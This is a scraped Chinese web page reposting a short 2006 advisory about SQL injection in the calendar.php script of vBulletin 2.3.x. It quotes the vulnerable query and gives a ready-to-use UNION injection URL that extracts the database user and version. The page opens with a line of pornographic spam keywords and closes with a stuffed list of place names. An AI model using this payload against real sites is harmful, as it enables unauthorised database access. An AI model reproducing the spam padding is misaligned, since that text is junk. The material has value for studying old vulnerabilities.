最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

vBulletin Forum 2.3.xx SQL Injection

 更新時(shí)間:2006年10月09日 00:00:00   作者:  

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

相關(guān)文章

最新評論

微博| 崇信县| 定襄县| 仙桃市| 镇雄县| 达日县| 龙南县| 科技| 禄劝| 抚远县| 普宁市| 香港| 新安县| 青铜峡市| 汨罗市| 九江市| 美姑县| 黄大仙区| 突泉县| 苏尼特左旗| 沈阳市| 睢宁县| 嵊州市| 邵武市| 开平市| 荥经县| 盐边县| 扶绥县| 宜州市| 云梦县| 汉川市| 平武县| 桐城市| 房山区| 安康市| 自治县| 莆田市| 海伦市| 蓬安县| 白山市| 布尔津县|